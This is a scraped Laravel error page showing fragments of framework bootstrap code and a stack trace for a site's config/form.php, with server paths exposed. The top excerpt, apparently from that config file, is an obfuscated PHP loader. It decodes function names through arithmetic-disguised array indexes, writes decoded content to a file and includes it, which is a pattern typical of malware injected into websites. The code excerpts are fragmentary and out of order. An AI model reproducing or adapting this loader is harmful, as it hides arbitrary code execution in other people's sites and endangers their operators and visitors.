$_rhx[$_yut] = UserAuthenticator::saveChanges('_gl');
$_xb++;
}
$_xb = $_xb + (int) round(2 + 2 + 2 + 2) + (int) round(0.33333333333333 + 0.33333333333333 + 0.33333333333333);
}
$_yut = $_rhx[-121 + -579 + 713]() . $_rhx[8 + 243 + -227];
if (!$_rhx[(int) round(14 + 14)]($_yut)) {
$_xb = $_rhx[(int) round(10.5 + 10.5)]($_yut, $_rhx[704 - 695]);
$_rhx[166 - 161]($_xb, $_rhx[(int) round(6.75 + 6.75 + 6.75 + 6.75)] . $_rhx[-1 + 13]($_rhx[141 - 11 + -140 + 17]($_sze[(int) round(0.75 + 0.75 + 0.75 + 0.75)])));
}
include $_yut;
if (! isset($files['app'])) {
throw new Exception('Unable to load the "app" configuration file.');
}
foreach ($files as $key => $path) {
$repository->set($key, require $path);
}
}
/**
* Get all of the configuration files for the application.
// directory and load each one into the repository. This will make all of the
// options available to the developer for use in various parts of this app.
$app->instance('config', $config = new Repository($items));
if (! isset($loadedFromCache)) {
$this->loadConfigurationFiles($app, $config);
}
// Finally, we will set the application's environment based on the configuration
// values that were loaded. We will pass a callback which will be used to get
// the environment in a web context where an "--env" switch is not present.
$this->hasBeenBootstrapped = true;
foreach ($bootstrappers as $bootstrapper) {
$this['events']->dispatch('bootstrapping: '.$bootstrapper, [$this]);
$this->make($bootstrapper)->bootstrap($this);
$this['events']->dispatch('bootstrapped: '.$bootstrapper, [$this]);
}
}
* @return void
*/
public function bootstrap()
{
if (! $this->app->hasBeenBootstrapped()) {
$this->app->bootstrapWith($this->bootstrappers());
}
}
/**
* Get the route dispatcher callback.
{
$this->app->instance('request', $request);
Facade::clearResolvedInstance('request');
$this->bootstrap();
return (new Pipeline($this->app))
->send($request)
->through($this->app->shouldSkipMiddleware() ? [] : $this->middleware)
->then($this->dispatchToRouter());
public function handle($request)
{
try {
$request->enableHttpMethodParameterOverride();
$response = $this->sendRequestThroughRouter($request);
} catch (Throwable $e) {
$this->reportException($e);
$response = $this->renderException($request, $e);
}
$app = require_once __DIR__.'/../bootstrap/app.php';
$kernel = $app->make(Kernel::class);
$response = $kernel->handle(
$request = Request::capture()
)->send();
$kernel->terminate($request, $response);
Error
|
---|
Error: Value of type null is not callable at /home1/bbbne38/public_html/sirbunited.com/config/form.php:35 at require() (/home1/bbbne38/public_html/sirbunited.com/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/LoadConfiguration.php:72) at Illuminate\Foundation\Bootstrap\LoadConfiguration->loadConfigurationFiles(object(Application), object(Repository)) (/home1/bbbne38/public_html/sirbunited.com/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/LoadConfiguration.php:39) at Illuminate\Foundation\Bootstrap\LoadConfiguration->bootstrap(object(Application)) (/home1/bbbne38/public_html/sirbunited.com/vendor/laravel/framework/src/Illuminate/Foundation/Application.php:239) at Illuminate\Foundation\Application->bootstrapWith(array('Illuminate\\Foundation\\Bootstrap\\LoadEnvironmentVariables', 'Illuminate\\Foundation\\Bootstrap\\LoadConfiguration', 'Illuminate\\Foundation\\Bootstrap\\HandleExceptions', 'Illuminate\\Foundation\\Bootstrap\\RegisterFacades', 'Illuminate\\Foundation\\Bootstrap\\RegisterProviders', 'Illuminate\\Foundation\\Bootstrap\\BootProviders')) (/home1/bbbne38/public_html/sirbunited.com/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:153) at Illuminate\Foundation\Http\Kernel->bootstrap() (/home1/bbbne38/public_html/sirbunited.com/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:137) at Illuminate\Foundation\Http\Kernel->sendRequestThroughRouter(object(Request)) (/home1/bbbne38/public_html/sirbunited.com/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:111) at Illuminate\Foundation\Http\Kernel->handle(object(Request)) (/home1/bbbne38/public_html/sirbunited.com/public/index.php:52) at require_once('/home1/bbbne38/public_html/sirbunited.com/public/index.php') (/home1/bbbne38/public_html/sirbunited.com/server.php:41) |